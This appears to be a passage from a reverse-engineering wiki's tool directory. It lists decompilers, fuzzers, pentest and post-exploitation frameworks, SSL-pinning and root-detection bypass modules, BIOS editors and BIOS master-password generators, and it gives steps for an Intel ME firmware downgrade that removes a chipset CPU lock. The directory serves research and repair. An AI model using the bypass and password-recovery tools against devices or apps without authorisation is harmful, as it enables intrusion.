::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.

======.NET tracers======

::*[http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.

=====JAVA (JVM) Decompilers=====

:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly & Ethereum Decompilers.

======JAVA (ART/APK)======
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.

:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR & Dex decompiler for android.
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.

======RASP (Runtime Application Self-Protection) Android======
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing. 
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted. 
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.

======JAVA deobfuscators (mixed platforms)======
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.

:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...

======JAVA decompilers (platform independent)======
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.

====Debuggers / Disassemblers for '''unmanaged''' binaries====

=====AutoIt=====
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of "compiled" AutoIt scripts from PE executables.

=====VB6=====
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables.
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.

====Bytecode Decompilers====

=====React Native Hermes=====
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.

:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).

=====Python=====
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.

=====Lua=====
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.

----

====Fuzzers====

*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).

*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.

*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.

*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!

*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).

*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.

*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.

*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.

====PC platform exploration frameworks====

*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.

*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.

*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.

*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.

====Mobile exploration frameworks====

*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.

*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.

*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.

*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.

*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.

*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.

*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.

*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.

::LSPosed Module Repository
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.

*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].

::Xposed modules
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..

::Xposed Framework API Development Documentation
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.

====Network Inspection====

=====Promiscuous mode eavesdropping TCP/UDP=====

::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.

::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows.

::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source & easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.

::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis & modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.

=====HTTP(S) Debuggers / Web Debuggers=====

::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.

::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.

::*[https://github.com/httptoolkit HTTP Toolkit] - is a beautiful, cross-platform & open-source HTTP(S) debugging proxy, analyzer & client, with built-in support for modern tools from Docker to Android to GraphQL.

::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.

::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler & Postman together with beautiful, modern UI & collaboration features.

::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.

=====Other Network Tools=====

::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).

::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.

::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.

::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.

----

====BIOS (basic input/output system) firmware modifying software====
Unified Extensible Firmware Interface (UEFI) & legacy computer BIOS (basic input/output system) firmware modifying software. 

=====UEFI=====
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 & >>) InsydeH2o because of SMM protection or variable locking.
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 & >>) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.

=====BIOS (legacy)=====
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.
:::'''AMI'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]
:::'''Award'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.
:::'''InsydeH2O'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]
:::'''Phoenix'''
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.

:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]

:::'''Tool collections'''
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.

:::'''Microcode Extraction Tool'''
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.

:Bios password resetting
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.

::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756

::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).

::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called "AMITSEDecrypt" to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.

::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.

=====HM70 PCH chipset Bypass Unsupported CPU=====
:Machine shuts down after 30 minutes if a '''"unsupported CPU"''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset. 
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..] 
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium & Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]

======Intel Management Engine Firmware Downgrade Attack======

::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.
::Then download the Intel ME version just below the firmware version you try to downgrade.
::Fire up your hex editor search in your bios blob for '''"0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20"''' Intel ME 1.5M blob will start ascii text '''"$FPT"'''.
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.

::This downgrade attack successfully bypassed the 30 minute shutdown restriction timer.

:'''Required tools''':
::*[[Software_Tools#Hex_Editors|Hex Editor.]]
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine & Graphics Firmware Analysis Tool.
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]

----

====Operating Systems====
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.
=====Mostly X86-64=====
======Penetration Testing & Digital Forensics======
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.

*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.

*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.

*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.

*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.

*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.

*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.

*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.

======RF Signals Analysis OS [RISC SBC & X86-64]======
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.

======Privacy Operating System======
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.
